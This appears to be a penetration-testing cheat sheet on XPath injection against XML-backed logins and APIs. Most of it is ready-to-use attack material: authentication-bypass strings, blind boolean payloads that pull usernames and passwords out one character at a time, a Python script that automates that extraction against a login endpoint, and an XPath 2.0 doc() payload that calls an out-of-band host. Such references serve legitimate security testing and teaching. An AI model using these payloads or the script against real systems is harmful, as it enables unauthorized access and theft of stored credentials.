Web

XPath Injection

XPath injection for XML database auth bypass and blind data extraction: detection, boolean-based character extraction, error-based confirmation, XPath 2.0 doc() OOB, and Burp testing workflow.

What is XPath Injection

XPath is a query language for XML documents. Web applications use XPath to authenticate users or query XML databases (config files, WSDL, native XML DBs like eXist-db, MarkLogic). When user input is concatenated into an XPath expression unsanitised, an attacker can rewrite the query — similar to SQL injection but against XML data.


Detection

Step 1 — Inject XPath special characters

In Burp Repeater, inject into login and search parameters:

'
"
' or '1'='1
' or 1=1 or 'a'='b
x' or 'x'='x

A changed response (error, unexpected success, or different XML) indicates XPath injection.

Step 2 — Confirm with always-true condition

username=' or '1'='1
password=' or '1'='1

If login succeeds without a valid password → XPath auth bypass confirmed.

Step 3 — Distinguish from SQL injection

XPath functions are specific — if errors mention string(), substring(), count(), position(), or last() → XPath context confirmed.


Authentication Bypass

Simple OR bypass

username=' or '1'='1' or 'x'='x
password=anything

XPath expression becomes:

//users/user[name/text()='' or '1'='1' or 'x'='x' and password/text()='anything']

The or '1'='1' makes the whole condition true.

Comment-style injection

XPath 1.0 has no comment syntax — use payload structures that close and reopen conditions:

username=admin' or '1'='1

Data Extraction — Blind Boolean-Based

When no data is reflected, extract values character by character using boolean conditions.

Check if the first character of the first username is ‘a’:

' or substring(//users/user[1]/name/text(),1,1)='a' or 'x'='y

In Burp Repeater:

username=' or substring(//users/user[1]/name/text(),1,1)='a' or '1'='2
  • true response → first char is ‘a’
  • false response → first char is not ‘a’, try next letter

Automated extraction script

import requests
import string

target = 'http://TARGET/login'
found = ''
pos = 1

while True:
    for c in string.printable:
        payload = f"' or substring(//users/user[1]/name/text(),{pos},1)='{c}' or '1'='2"
        r = requests.post(target, data={'username': payload, 'password': 'x'})
        if 'Welcome' in r.text:
            found += c
            print(f'Found: {found}')
            pos += 1
            break
    else:
        break

print(f'Username: {found}')

Extract Password

' or substring(//users/user[position()=1]/password/text(),1,1)='a' or 'x'='y

Count Records

' or count(//users/user)>0 or 'x'='y
' or count(//users/user)=3 or 'x'='y

Enumerate Node Names (if unknown schema)

' or name(//*)='users' or 'x'='y
' or substring(name(//node()[1]),1,1)='u' or 'x'='y

XPath 2.0 — OOB via doc()

In XPath 2.0 (used by eXist-db, MarkLogic, Saxon):

' or doc('http://COLLABORATOR/evil')='' or 'x'='y

Triggers an HTTP request to the Collaborator URL — OOB confirmation of XPath 2.0 injection.


XPath in SOAP / XML APIs

In a SOAP request or XML body:

<username>' or '1'='1</username>
<password>x</password>

The XPath query becomes: //user[name='' or '1'='1' and pass='x']


Useful XPath Functions

FunctionPurpose
string-length(text())Get length of a value
substring(text(),pos,len)Extract characters
contains(text(),'x')Check if value contains substring
count(//node)Count nodes
name(node)Get node name
last()Index of last node
position()Current node position

Burp Suite workflow

  1. Proxy — intercept login and search requests; look for XML content or XML-style responses.
  2. Repeater — inject ', ", ' or '1'='1 into all input fields.
  3. Intruder — character brute-force for blind extraction (positions 1–20, chars a-z0-9).
  4. Scanner — active scan detects XPath injection via error-based and boolean response differences.
  5. Collaborator — OOB confirmation via XPath 2.0 doc() function.